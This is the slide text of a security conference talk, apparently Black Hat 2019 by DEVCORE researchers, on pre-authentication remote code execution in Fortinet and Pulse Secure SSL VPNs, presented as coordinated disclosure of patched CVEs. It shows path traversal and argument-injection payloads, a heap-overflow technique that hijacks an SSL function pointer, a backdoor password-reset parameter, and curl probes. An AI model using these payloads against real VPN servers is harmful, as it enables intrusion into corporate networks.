VPN Rce's PDF
VPN Rce's PDF
VPN Rce's PDF
Like NSA
Pre-auth RCE on Leading SSL VPNs
USA 2019
Orange Tsai
• Principal security researcher at DEVCORE
• Captain of HITCON CTF team
• 0day researcher, focusing on
Web/Application security
orange_8361
Meh Chang
• Security researcher at DEVCORE
• HITCON & 217 CTF team
• Focus on binary exploitation
mehqq_
Highlights today
• Pre-auth root RCE exploit chain on Fortinet SSL VPN
• Hard-core binary exploitation
• Magic backdoor
50
26
17 13 6
https://nvd.nist.gov
We focus on…
• Pulse Secure SSL VPN
• More than 50,000+ servers operating on the Internet
• Trusted by large corporations, service providers and government
entities
• vmlinuz kernel
LILO/GRUB
• Stage 1 • Level - Hard
• Stage 2
• Reverse engineering for the win!
vmlinuz kernel • /sbin/init
• zImagea
• bzImage • Level - Easy
• Memory forensics for the win!
/sbin/init
The booting process
BIOS
LILO
Kernel
/sbin/init
?????????????????
The booting process
BIOS
LILO
Kernel
/sbin/init
?????????????????
Find the vital point
BIOS
LILO
Kernel
/sbin/init
Memory Forensics
/home/bin/dsconfig.pl
In-memory patch
BIOS
LILO
Kernel
/sbin/init
Memory Patch
///////////////bin/sh
Once we press the Enter…
BIOS
LILO
Kernel
/sbin/init
///////////////bin/sh
Digging at a correct place
Attack vectors
• WebVPN
• Native script language extensions
• Multi-layered architecture problems
WebVPN
my ($var) = @_;
EXTENSION::C_function($var);
Multi-layered architecture
problems
• Inconsistency between each architecture layer
• Failed patterns
• Reverse proxy + Java web = Fail
• Breaking Parser Logic by Orange Tsai from Black Hat USA 2018
https://sslvpn/public/images/x/front_x/../../../../some.php
Case studies
Pre-auth remote code execution on Fortigate SSL VPN
Pre-auth remote code execution on Pulse Secure SSL VPN
Disclaimer
All the CVEs mentioned below have been reported and patched
by Fortinet, Pulse Secure and Twitter
Fortigate SSL VPN
lang=/../../../..//////////////////////////////bin/sh
snprintf(s, 0x40, "/migadmin/lang/%s.json", lang);
/migadmin/lang//../../../..//////////////////////////////bin/sh.json
0x40
An SSL VPN mystery
Appears in many products …
Excessively detailed session file
• /dev/cmdb/sslvpn_websession
• Session token
• IP address
• User name
• Plaintext password
WebVPN
WebVPN – HTTP/HTTPS
https://sslvpn:4433/proxy/72ebc8b8/https/devco.re/
WebVPN – HTTP/HTTPS
Heap overflow vulnerability
• HTTP proxy
• Perform URL rewriting
• JavaScript parsing
• memcpy to a 0x2000 heap buffer without length check
Normal request
Exploit between connections
Connection 3
Connection 1
Connection 2
LOW HIGH
HEAP MEMORY
Original SSL structure
ssl_accept()
*handshake
version method … …
_func
LOW HIGH
HEAP MEMORY
Trigger JavaScript Parsing
ssl_accept()
*handshake
version method … …
Allocate _func
LOW HIGH
JS
SSL SSL SSL
Buffer
HEAP MEMORY
Overflow SSL structure
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ssl_accept()
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*handshake
version method …
_func
…
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
memcpy(buffer, js_url, js_url_len);
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
LOW
JS
HIGH
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*handshake
*handshake
version
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
method …… ……
_func
_func
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
LOW HIGH
AAAAAAAAAAAAAAAAAAAAAAAAAA
SSL SSL SSL
AAAAAAAAAAAAAAAAAAAAAAAAAA
HEAP MEMORY
Forge SSL structure
system()
*handshake
version method … …
_func
LOW HIGH
HEAP MEMORY
Enjoy your shell!
• A “magic” parameter
• Secret key for reset password
• Designed for updating outdated password
• but lack of authentication
Demo
Pop a root shell from the only exposed HTTPS port
Demo
https://youtu.be/Aw55HqZW4x0
Pulse Secure SSL VPN
• Probably YES!
• All un-patched versions are vulnerable except the End-of-Life 8.1 code
$ curl -I 'https://sslvpn/dana-na///css/ds.js'
HTTP/1.1 400 Invalid Path
$ curl -I 'https://sslvpn/dana-na///css/ds.js?/dana/html5acc/guacamole/'
HTTP/1.1 200 OK
What can we extract?
/dana-admin/diag/diag.cgi
sub tcpdump_options_syntax_check {
my $options = shift;
return $options if system("$TCPDUMP_COMMAND -d $options >/dev/null 2>&1") == 0;
return undef;
}
Command Injection
Pulse Secure hardenings
• DSSafe.pm
• A Perl-C extension hooks several Perl functions such as:
• system, open, popen, exec, backstick…
dssafe_example.pl
use DSSafe;
$ tcpdump -d -r '123'
tcpdump: 123: No such file or directory
RCE Exploit
/usr/sbin/tcpdump -d
1 -r'$x="ls",system$x#'
2>/data/runtime/tmp/tt/setcookie.thtml.ttc
<
>/dev/null
2>&1 STDERR(2) > /data/runtime/tmp/tt/setcookie.thtml.ttc
<boot bin home lib64 mnt opt proc sys usr var
data etc lib lost+found modules pkg sbin tmp
>/dev/null
...
2>&1
Response from Pulse Secure
• Pulse Secure is committed to providing customers with the best Secure Access Solutions
for Hybrid IT- SSL VPN and takes security vulnerabilities very seriously
• Timeline:
• This issue was reported to Pulse Secure PSIRT Team on March 22, 2019
• Pulse Secure fixes all reported issues in short span of time and published the security advisory SA44101 on
April 24, 2019 with all software updates that address the vulnerabilities for unpatched versions
• Pulse Secure assigned the CVE’s to all reported vulnerabilities and updated the advisory on April 25, 2019
• Pulse Secure sent out a reminder to all customers to apply the security patches on June 26, 2019
• Pulse Secure would like to thank DEVCORE Team for reporting this vulnerability to Pulse
Secure and working toward a coordinated disclosure
Hacking Twitter